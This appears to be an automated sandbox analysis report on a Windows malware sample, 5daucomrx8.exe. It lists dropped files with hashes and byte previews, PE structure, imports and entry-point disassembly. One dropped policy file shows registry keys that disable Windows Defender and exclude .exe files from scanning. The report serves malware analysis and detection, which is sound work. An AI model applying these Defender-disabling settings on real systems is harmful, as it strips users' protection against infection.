                            Preview:...&...,@gD|.......#v.....T*.}.W"......k1......1.x^ .........C7?..R.k..O.^S.Xe.d....:2..!..H...p....=u..C.q..*[..wO46.OqXR...}...x.T.t[.0..O..]!H...........8.<.W<..i....$..(.i..Ce..GT...$..K.bc..mF._....j......g..$.z.........[M...a.o..............L.+.1...-Q9.td.]._.............0...._.....9...'.../}...4.%.!..w.mxdyO.x^\...O.?l.L....z{.=t.%.[..%..Q....XR.7@.+...u.U....f:T..lX...d....O.O.K1....<.4.T.@(7.RDf..V.)B..c..p..O.L...7..(..S..M9..f/..w ....+.s......P..>...C{4..........Mk.....8G.......9j.f.Z..Om$j.j'(.UB.(..-\....,R7...kxc6]E.9....O:!..{..~C,w.@...D.\|2.=...N......kk.R.q.....?~=.<...6...........]...?$.^.P...,...R.D.i..x?......gI..i.,..e.m.dl...............+..he:..I._0..H<Zr./q..ur..].p....i..l...%...7...(]..\>..=Z..rw..<.U..R.^.nv.Z.......Oq.#F...-./..;T.^........c.. .Wn6....D...U. .'z9.q,.., ..F.'7... .p..o#2...d$_...p..%.W]. 6]...).$7.*c..g[...4PP...._.D.....4Q...FF...|.3...%.....>..:.....0E.e...+..=...;..7g...mT.*.f.....S.L....}.._.X
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):25600
                            Entropy (8bit):4.255745457841842
                            Encrypted:false
                            SSDEEP:48:D1YIEqAniRRGVpIsssssCssssssssnsssssssssssssssssssssssssssssssss7:p1/AniRRUp1HwJNGMh5iCfXfJ4LLF
                            MD5:565C34A01AB8904E85EF374CC03651A4
                            SHA1:0DD3C73AABE9B950C356921221DCA747EB8B9011
                            SHA-256:936926C20932948640765731B8D130F0230249CD30FB30447734D61F621A2704
                            SHA-512:491B3C3B12C1B01764EB3C97CAC23A1E2FE8FBFA3F46E32606D102530E6BBCCDDB49F66CCE1C359B4C69EA256722C4EB8FF9B77513CADFCFEA23319C580783D3
                            Malicious:false
                            Preview:....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................m.m.m.m.m.m.m.m.m.m.m.m.2.2.2.2.2.2.2.2.2.2.2.2.2.2.
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):101376
                            Entropy (8bit):7.998207860514862
                            Encrypted:true
                            SSDEEP:3072:y9AKfAie9jD0Y0TQlRP+hbTJGc56J63fbqC:GAK4ied0TOVabTJXVL
                            MD5:6675D3E1DA6AA19BB5135860F0EA0D37
                            SHA1:D3C81ABFC7C14E7A73F31DAA3078FD31394E2859
                            SHA-256:A9A5D51B384D8C3F746A8881A46C285D2EFD7291386C794AE9B7640D4BCFD500
                            SHA-512:C6DB87D1D635FCB6FBC76AF431121A7958CBF0CECFC4EFA3C3D6BB4DF41F3D2BCF36D378929162D3EF6900BC68AD578511D615A07C6BF3B86E1A7B3AC55E953E
                            Malicious:true
                            Preview:...;.........$..=..4.nf.8...Zs.o.o...`Jw|Qj..-..~...)-...Q@g.j.;:.,[.D.{.j~...\.U.".;..* ...X.w....2.._..!{$.l(m.#{@.{.,,a-...k.".L......P........RiMr;K.'.....A.v...9..}....g0A..j....<e.jQ..cP....H+.O..c.M8...,.^Nf....KW..'..^?)oN4.Ef.D.!r](...W<.'.0...$.>_...g.yM....J.|.....u.h!.m./..S..0,D..P..l`..nt...U....1....'1.~....m....\.m.}.>...@_W9.6.3.f..P.....[.I...A....e^......4......;....zH&...z{e.a.9.e..n.s....-. .Q......[....hb.........n..1L....c.l..%'..N...0.(.T....J..G..v.uQ.L.lhU......Y<..9.`.....G..3.E...Dp...r........Pvgcc....e..TooU.S...|...F.G.]...8......v.ho..N0:.'.bG.....G..i.t.3..k...Y.D..^....py8..Y,.4sL......w...&..T.>...o ..R.t...;..S...T}\c....m....<k.A..HD..y7.D....o.6^Q<.......l...V%^.oM...4X....yj.#.. h....(..".....w&...V.}...*z.......S..NS..>..AK...G....4.d..1.'.|i..+..'...>....d%6"...#2`R..>..\....hI~...%.^X.. 0g...._Mx.....6n....Dr....W.._Yc...b.%D."..-..0#..f.I...W.2....}.g.".V.q.S.m.C......s.I7&.......O....).(....^...
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.264996685135176
                            Encrypted:false
                            SSDEEP:768:7q25NKEHq9BxyyM0Dj2Bmgari0UPD/3Efrafd0maNBZikj0kkuhsRqI5o+k:ZNHq9Bxhgari/D/3EfraF0Hikj06Lz
                            MD5:75318145A2346FADDDE0AD48BFB0D31D
                            SHA1:11139B56D08EBD2CA1C220D222B44FFA04C2B301
                            SHA-256:C386693C1913B1EB863E09727B8E18CAE277849F6F16A4028EB68233AEE4396D
                            SHA-512:1D565E1EABADD324CF4E9022372CAC77F09750D3074F97008F370FF91802ADCBBBE8468BC45F20D09FB9758589DEC924A7E302AE9247880BDC48D164C344A80E
                            Malicious:false
                            Preview:u.3.;.*...a.3.x...A.l.l. .f.i.l.e.s. .(.*...*.)...*...*.....a.u.3...#.i.n.c.l.u.d.e. .d.e.p.t.h. .e.x.c.e.e.d.e.d... . .M.a.k.e. .s.u.r.e. .t.h.e.r.e. .a.r.e. .n.o. .r.e.c.u.r.s.i.v.e. .i.n.c.l.u.d.e.s...E.r.r.o.r. .o.p.e.n.i.n.g. .t.h.e. .f.i.l.e.....>.>.>.A.U.T.O.I.T. .S.C.R.I.P.T.<.<.<...B.a.d. .d.i.r.e.c.t.i.v.e. .s.y.n.t.a.x. .e.r.r.o.r.....U.n.t.e.r.m.i.n.a.t.e.d. .s.t.r.i.n.g...C.a.n.n.o.t. .p.a.r.s.e. .#.i.n.c.l.u.d.e...U.n.t.e.r.m.i.n.a.t.e.d. .g.r.o.u.p. .o.f. .c.o.m.m.e.n.t.s.....O.N.....O.F.F...0.%.d...%.d.....S.h.e.l.l._.T.r.a.y.W.n.d...R.E.M.O.V.E.....K.E.Y.S.....E.X.I.S.T.S.....A.P.P.E.N.D.....b.l.a.n.k...i.n.f.o.....q.u.e.s.t.i.o.n.....s.t.o.p.....w.a.r.n.i.n.g.....L.i.n.e. .%.d.:. .....B.U.T.T.O.N.....#.3.2.7.7.0.....\.\.?.\.....\.\.?.\.U.N.C.\.....\.\...\.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.\...\.V.a.r.F.i.l.e.I.n.f.o.\.T.r.a.n.s.l.a.t.i.o.n.....0.4.0.9.0.0.0.0.....D.e.f.a.u.l.t.L.a.n.g.C.o.d.e.p.a.g.e...%.u...%.u...%.u...%.u...\.*...*.....0...0...0...0...o.p.e.n. ... .a.
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):25600
                            Entropy (8bit):4.5949349580540915
                            Encrypted:false
                            SSDEEP:384:MPsjnQV6QvXdooooooooooooooooooooooty:cUHiy
                            MD5:93E1FB7C29E1C5D82D72013FD87585A2
                            SHA1:F8A28C23DC625DF120E1C29E2A9E14BF6F9E07F3
                            SHA-256:B910C0C4E8DFC593B3925AFC41F5BB1A5FA86A145E62577307AF2F7FF6427830
                            SHA-512:4E663FBB6E10042168E35F3098B9FD37ADDC22FD84A5901E12C4EC7FB576FC7CE9CDE2BB0FB10A29B8C6E8B0FC102386B7B7AD511E1811FCB7E5F972B9E4AA93
                            Malicious:false
                            Preview:m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.......................................................m...................................................................................................................................................................h.h...........................................................................m...............m.......m.................m.m.....m.m.............................................m...............m...m.m.m.........m.m...................m.m.....m.m.........m.m.m.m.m.m.m.m...m.m.m.m.....m...........m.m.............................................m.m.m.m.m.......m.............m.m.m.m.....m.m.............................................m...............m.....m.....m.....m.m...m...........m.m.m.m.....m.m.......m.m.m...m.m.m.m.m.m.m.........m...m.m.m.m.m.m.m.................................m.m.m.m.m.m.m.m.m.m.m.......m...................m.......m.............................................m...............m.....m...........m.m.....
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0
                            Category:dropped
                            Size (bytes):11264
                            Entropy (8bit):6.127678229864238
                            Encrypted:false
                            SSDEEP:192:00GMKTY89cKyjB+mOofFsBk2yR6DXAhADUh95ybOIOo94:0kcHyjJFsBNywAhADsUi
                            MD5:C3DF7A4BAE78D93A1AA952A415619D40
                            SHA1:93CC13AA30F070C943BAE96ECFCF4505CA13CF98
                            SHA-256:47C455D9E9834DB22C39BC8B1D3D3B4DFC15207647CCBFEA35A16F7CAF11A442
                            SHA-512:7EC31765F35B1B0E2CE3C091C10721589177D78C16B82A9E5E8B3292822AAADC0C91962F216208E521018B43AB341AE547FD667D945C1A3A480B08863435F50F
                            Malicious:false
                            Preview:........................```.....vvv.............................b\Y.aL:.|W3..e6..p<..yA...C..~C..w@..o<..b6.rR3.\J<.a\X.................................}}}.\\\.....................................................```.....xxx.........................]VR.\B/.{K'..X,..i3..t8..}?...B...D...D...B..~?..u9..g4..V,.qG(.UA2.[VS.................................ZZZ.............................................ZZZ.....zzz.........................UH?.g<..}F"..S&..^,..i1..t9...A...I...P...P...J...B..u9..j2.._,..U(.vE".\:!.RHA.................................TTT.....................................\\\0qqq...www.................a^\.S?1.j>..wC...K!..T'.._+..k4..w?...K...W...\...\...W...K..x?..l5..`,..U'..K".tB .a; .L>3.`]\.........................xxx.FFF8................................bbb.....ttt.................da_.Q=..i?..sD..zI!..M#..W*..g7..uF...T...`...h..n..n...i...a...U..wG..g7..X+..N#.{I!.sD .`;..J;0.a`^.........................^^^.............................ZZZN............................
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):28672
                            Entropy (8bit):6.773492243030843
                            Encrypted:false
                            SSDEEP:768:4rUCVoyOQ5DuOKHnPiamE9w97OUg4eVD5:4rnVRCOa69E9wFOUg/R5
                            MD5:ECD876C831C2B3E1708FE81C1053EEE4
                            SHA1:627E0C5B56DA36FF30F5A9E8BE218525AE3A8059
                            SHA-256:1618767B6776FE41E17E4841FD9DA532D0A59563342DC174D143FD42111B3DDB
                            SHA-512:130D0100DB8DC13FA2820E98377A8B0B9AA820804B17C097ECFA6C1CC9D3AB0921AF7953A249635EC50097D0DFD4601FE985ABA207D658FF22B4E77A6AACDF72
                            Malicious:false
                            Preview:d`].....................WWW.....................ggg.................{{{.}}}.~vp.......................................rlf.}}}.....................```.............................jjj.................yyy.yyy.zzz.vqm.......................{.pkg.zzz.{{{.yyy.................bbb....................................+jjj.....................nnn.ppp.xxx.{{{.{{{.zzz.{{{.yyy.rrr.mmm.....................bbb.YYY'........................................ggg.............................ttt.ggg.hhh.vvv.............................bbb.}}}.................................................dddtnnn........................................................nnn.ZZZp................................................................fffummm........................................mmm.___r................................................................................qqqEddd.hhh.nnn.uuu.ttt.nnn.ggg.```.eeeB.......................................................?........................................................
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):7168
                            Entropy (8bit):6.231901580470429
                            Encrypted:false
                            SSDEEP:96:8Whz/SRYOb1a9BlZzAC3druYds27BHD0PD1xvnprnZY2jPoY1xHlz1Patdd:8Sz/SRYOithuYS2ZAD/vprnBQOz1id
                            MD5:BEDA7B30D256F7E4D8EE5876D0B262C5
                            SHA1:7DBB99BBC4DD7D23FCF9834488AA59F6B50BBA51
                            SHA-256:8414705DD0333529CD4077588EE720BCF32E5BC28CAF90F552F73341BB0AE54F
                            SHA-512:2B06A95529B87846B62317A2141438558F9A91B0804F7C48A88FDB6CC7E093F209E9089E0262FEAD5F4B4F03711BCB4E2748081B7FAE8D377CFBD3CF980B1A80
                            Malicious:false
                            Preview:.....M.+Nx.F....L..9}....G..E.....]..................E.u.................3..E..S..M.@Pj.V.u..u.............tV......tN.E....... ...u%..C...C9...........f.;wt.f.8w..................C.f.<Cw..Ct..........E.f.;x.. ............C.f.<Cw..Ct.........].E..6................u..E.................E......E..S..M.@Pj.V.u..u.................. ....-u>..C...C9.....sJf.;wt.f.8wu>..C.f.<Cw..Ct..<.....t.H..f................U....................C.f.<Cw..Ct.}............]..c....}..t?..K...~Q.E.I....E.;Fx......f.......f#.....f;.E.u.....E.........C..M....A...M.;Fx......E.;.....s...........]......=$uL.........0.........C...4....F...8....Fx..<....F|+Fx....@....E.+Fx....D....E.+Fx....H.....C...X.....C...\....E..+.....L............P.....u..P...............T...........`.....0...P..$uL..................U.....].....Nt..C..<A.}.;.u.3.....W.........t..E.;Q.u.;A.u.......m.......u.U...........E..E..E........E..E........N..].M.............E..........P..<dJ.....E......Y...M....Q.v.P.............f9..
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):44032
                            Entropy (8bit):7.995561012121999
                            Encrypted:true
                            SSDEEP:768:ULqY7TzZg952TwIUPX/eBOPp5PiIcpgmwmFbWzUrD2Tlha13M/PX/pEE:Uj7TotIUnA49cqmwe32Bha13M/pEE
                            MD5:3032F7CAD7D5FDC76480D35C1B96F1D7
                            SHA1:17118E193C859BA96F330F2DFA8CF3994AB6AE6B
                            SHA-256:8787ADE46BC3D7F369535A52AD0DDEEFB014652D8E2B83A531A7498E2770C2E3
                            SHA-512:565F31ABEECBD55BB6CC920F9888074C779AE12547DDF941EA63F1BF0632B6FC8894E40B54FA8FEA23041ED8C96AD2893F5C5D4BAC31DA542B1D62CE5C163B27
                            Malicious:true
                            Preview:..P/.....}..B.g.^..p...+.:k9..8....43.ke7...JQ!..(R....^LBB.zCz(L.R.xk..RQ>DbJ....f.........,~.f.8~....!t..hh]..7!Z.I.....U...W0....x1G.....v.a.F...N.....k.n..o.wX........N=>..f.F...Ro1X..q}...8.\....<:M@.C.<..l.....6.{i...u-..5.X..v`.9.e.....E!..IMc....H...B.....FU.F2G5.r..n...^....Fw....[(.+'o.,K.n...v..z.5...;k@|.+..<.*.^.....>g.%O..........6_..k....p.q..G.26.-k.....j..h.Z0\J#~E..k1....v....G..V.j!I.':..Z,.?..t.o....:...]].`......P .r....G......:}.........yoc(..Z.#..=l{b2.)!..2....>...c....[...w.>.A. @+......u..fp...}%.z.a....o_1.>."~.z.`.].3}........v@.5Zw....\...A.@......w..OB.o..c.-...(r..2.eM.69...^..A.$_e..P.q..J.._...9'.r..;.D..C..Z...@...r.0.fu..4...8...y. S..3....VV..-..!.B...4........ .J@.v.?V.6...B..P,.....2.i...s.`.R.Z.V.6.3....O.y\.....a...1'.7.6.)E+.F%...6@....(.'.n..E..TY ..,..R..k"...,q...{. Tf.4...-..M .3&....7....^.y9....m..@..q .....*.%.ZR.9..]r.Bg..j.wH..2..a..0.... a...|....{#..H.1.O...&mT+...7..D.{.....it..N{.P...
                            Process:C:\Users\user\Desktop\5daucomrx8.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):55296
                            Entropy (8bit):6.184577192657991
                            Encrypted:false
                            SSDEEP:768:eTlKWzhQVNsbSSkLQ7PqYIueIVvaOsibzc+ylIt0su0B4y+aZmzdz:D7gqYrui3vylIusu0B4MmZ
                            MD5:A8592B01E55B70C3C7D82383CBEA914B
                            SHA1:3F5BC91EF9658DA1B8B3BD21F4C477EFEEFA9779
                            SHA-256:BA7160B3E08911B714F3AC8A40F2222745E31A187811BB69CEDCDF27AD83007C
                            SHA-512:E29733F533C4C6140FE63D20889DB1CD3C04102E08965EB7C115883F95ED23CFBE891F9A32962495D16BE095C4BD3D806378808B65A32054FBBE0E235B69CCCB
                            Malicious:false
                            Preview:.........L.........L......L.X.I.....L..F.....L.........L.........L.........L.........L......L...I.....L...F.....L.........L.........L.........L.........L......L...I.....L.0.F.....L.........L.........L.........L.........L......L...I.....L.l.F... .L.......$.L.......(.L.......,.L.......0.L....4.L...I...@.L...F...D.L.......H.L.......L.L.......P.L.......T.L....X.L...I...d.L...F...h.L.......l.L.......p.L.......t.L.......x.L....|.L...I.....L...F.....L.........L.........L.........L.........L......L.(.I.....L...F.....L.........L.........L.........L.........L......L.H.I.....L...F.....L.........L.........L.........L.........L......L.h.I.....L.+.F.....L.........L.........L.........L.........L......L...I.....L.G.F.....L....... .L.......$.L.......(.L.......,.L....0.L...I...<.L...F...@.L.......D.L.......H.L.......L.L.......P.L....T.L...I...`.L...F...d.L.......h.L.......l.L.......p.L.......t.L....x.L...I.....L...F.....L.........L.........L.........L.........L......L...I.....L...F.....L.........L.....
                            Process:C:\Users\user\AppData\Local\Temp\369580\Origin.pif
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):11
                            Entropy (8bit):3.2776134368191165
                            Encrypted:false
                            SSDEEP:3:1EX:10
                            MD5:EC3584F3DB838942EC3669DB02DC908E
                            SHA1:8DCEB96874D5C6425EBB81BFEE587244C89416DA
                            SHA-256:77C7C10B4C860D5DDF4E057E713383E61E9F21BCF0EC4CFBBC16193F2E28F340
                            SHA-512:35253883BB627A49918E7415A6BA6B765C86B516504D03A1F4FD05F80902F352A7A40E2A67A6D1B99A14B9B79DAB82F3AC7A67C512CCF6701256C13D0096855E
                            Malicious:false
                            Preview:[General]..
                            Process:C:\Users\user\AppData\Local\Temp\369580\Origin.pif
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):127
                            Entropy (8bit):5.080093624462795
                            Encrypted:false
                            SSDEEP:3:1ELGUAgKLMzY+eWgTckbnnvjiBIFVTjSUgf4orFLsUov:1WsMzYHxbnvEcvgqv
                            MD5:8EF9853D1881C5FE4D681BFB31282A01
                            SHA1:A05609065520E4B4E553784C566430AD9736F19F
                            SHA-256:9228F13D82C3DC96B957769F6081E5BAC53CFFCA4FFDE0BA1E102D9968F184A2
                            SHA-512:5DDEE931A08CFEA5BB9D1C36355D47155A24D617C2A11D08364FFC54E593064011DEE4FEA8AC5B67029CAB515D3071F0BA0422BB76AF492A3115272BA8FEB005
                            Malicious:true
                            Preview:[General]..gPCMachineExtensionNames=[{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}]..Version=1..
                            Process:C:\Users\user\AppData\Local\Temp\369580\Origin.pif
                            File Type:RAGE Package Format (RPF),
                            Category:dropped
                            Size (bytes):1926
                            Entropy (8bit):3.310422749310586
                            Encrypted:false
                            SSDEEP:24:wSLevFeSLe5BeSwbv5qweSw4q7j/eScdepWDbVeScden2W8eScdemevtmeScdeRg:KFIBkbv5qwk4qfKV2QxVCZ
                            MD5:CDFD60E717A44C2349B553E011958B85
                            SHA1:431136102A6FB52A00E416964D4C27089155F73B
                            SHA-256:0EE08DA4DA3E4133E1809099FC646468E7156644C9A772F704B80E338015211F
                            SHA-512:DFEA0D0B3779059E64088EA9A13CD6B076D76C64DB99FA82E6612386CAE5CDA94A790318207470045EF51F0A410B400726BA28CB6ECB6972F081C532E558D6A8
                            Malicious:false
                            Preview:PReg....[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r...;.D.i.s.a.b.l.e.A.n.t.i.S.p.y.w.a.r.e...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r...;.D.i.s.a.b.l.e.R.o.u.t.i.n.e.l.y.T.a.k.i.n.g.A.c.t.i.o.n...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.E.x.c.l.u.s.i.o.n.s...;.E.x.c.l.u.s.i.o.n.s._.E.x.t.e.n.s.i.o.n.s...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.E.x.c.l.u.s.i.o.n.s.\.E.x.t.e.n.s.i.o.n.s...;.e.x.e...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.R.e.a.l.-.T.i.m.e. .P.r.o.t.e.c.t.i.o.n...;.D.i.s.a.b.l.e.B.e.h.a.v.i.o.r.M.o.n.i.t.o.r.i.n.g...;.....;.....;.....].[.S.O.F.T.W.A.R.E.\.P.o.l.i.c.i.e.s.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.R.e.a.l.-.T.i.m.e. .P.
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):1.5694308867330604
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:5daucomrx8.exe
                            File size:19'159'316 bytes
                            MD5:33ff8752083bf6b5105749bf5b772b4a
                            SHA1:01f8869d2fcd4ff1184dfc956905e01eb15f0d92
                            SHA256:ee6ee03724690a677d4bf2610ea86d94eaeb94068d627fe36ec2f0353cc1c9ba
                            SHA512:26445b94571fb374b57bb0ee129a8e7fc624e7c3d315a6a6fc0f165f33fa593e90932ef4e5bb0faa7b91f9f1647fc62d1027e7bc58947da4ecdde11745104c7a
                            SSDEEP:49152:Ix1BZ/3KMJESGkP9bKJPUyN1RL7HDUq1373ht:+bZ/6JSGkPRwPU2R3Q63h
                            TLSH:A9173326E2B561D3E97E0A3171F1AB301BD2D432567098892A403DFD7C72BD3790A97E
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....
                            Icon Hash:cbc4e464a46466b0
                            Entrypoint:0x403883
                            Entrypoint Section:.text
                            Digitally signed:true
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:0
                            File Version Major:5
                            File Version Minor:0
                            Subsystem Version Major:5
                            Subsystem Version Minor:0
                            Import Hash:be41bf7b8cc010b614bd36bbca606973
                            Signature Valid:
                            Signature Issuer:
                            Signature Validation Error:
                            Error Number:
                            Not Before, Not After
                              Subject Chain
                                Version:
                                Thumbprint MD5:
                                Thumbprint SHA-1:
                                Thumbprint SHA-256:
                                Serial:
                                Instruction
                                sub esp, 000002D4h
                                push ebx
                                push ebp
                                push esi
                                push edi
                                push 00000020h
                                xor ebp, ebp
                                pop esi
                                mov dword ptr [esp+18h], ebp
                                mov dword ptr [esp+10h], 00409268h
                                mov dword ptr [esp+14h], ebp
                                call dword ptr [00408030h]
                                push 00008001h
                                call dword ptr [004080B4h]
                                push ebp
                                call dword ptr [004082C0h]
                                push 00000008h
                                mov dword ptr [00472EB8h], eax
                                call 00007F758506E66Bh
                                push ebp
                                push 000002B4h
                                mov dword ptr [00472DD0h], eax
                                lea eax, dword ptr [esp+38h]
                                push eax
                                push ebp
                                push 00409264h
                                call dword ptr [00408184h]
                                push 0040924Ch
                                push 0046ADC0h
                                call 00007F758506E34Dh
                                call dword ptr [004080B0h]
                                push eax
                                mov edi, 004C30A0h
                                push edi
                                call 00007F758506E33Bh
                                push ebp
                                call dword ptr [00408134h]
                                cmp word ptr [004C30A0h], 0022h
                                mov dword ptr [00472DD8h], eax
                                mov eax, edi
                                jne 00007F758506BC3Ah
                                push 00000022h
                                pop esi
                                mov eax, 004C30A2h
                                push esi
                                push eax
                                call 00007F758506E011h
                                push eax
                                call dword ptr [00408260h]
                                mov esi, eax
                                mov dword ptr [esp+1Ch], esi
                                jmp 00007F758506BCC3h
                                push 00000020h
                                pop ebx
                                cmp ax, bx
                                jne 00007F758506BC3Ah
                                add esi, 02h
                                cmp word ptr [esi], bx
                                Programming Language:
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [ C ] VS2010 SP1 build 40219
                                • [RES] VS2010 SP1 build 40219
                                • [LNK] VS2010 SP1 build 40219
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x6d00.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x1902d680x2d68
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0xf40000x6d000x6e0001b11916ca291372ff46521d718ca81dFalse0.7620028409090909data6.695161435450058IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0xfb0000xf320x100001effa914a90b27acd314f2e4522e5abFalse1.002685546875data7.941666429088442IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_ICON0xf42200x294fPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0010401891252956
                                RT_ICON0xf6b700x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.6057770545158666
                                RT_ICON0xf91d80x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.644808743169399
                                RT_ICON0xfa3000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.74822695035461
                                RT_DIALOG0xfa7680x100dataEnglishUnited States0.5234375
                                RT_DIALOG0xfa8680x11cdataEnglishUnited States0.6056338028169014
                                RT_DIALOG0xfa9880x60dataEnglishUnited States0.7291666666666666
                                RT_GROUP_ICON0xfa9e80x3edataEnglishUnited States0.8225806451612904
                                RT_MANIFEST0xfaa280x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                DLLImport
                                KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
